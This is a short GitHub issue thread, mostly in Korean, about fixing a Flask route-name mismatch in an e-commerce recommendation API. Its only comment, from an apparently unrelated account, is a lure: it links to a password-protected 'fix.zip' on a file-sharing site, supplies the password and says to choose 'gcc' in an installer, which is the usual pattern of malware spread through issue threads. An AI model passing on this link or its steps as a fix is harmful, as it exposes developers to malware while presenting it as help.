### ISSUE TITLE
🐛 fix: Recommened System API bug fix

### ISSUE THREAD

**Issue by Daehyun-Bigbread** [Kakaotech-18-Ecommerce/Kakaotech-18-AI#80]
# Title
- Flask API Route명 불일치로 인한 수정

# TODO

- [ ] routes.py
- [ ] app.py

# etc

- 라우트명 불일치로 인한 버그 수정

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
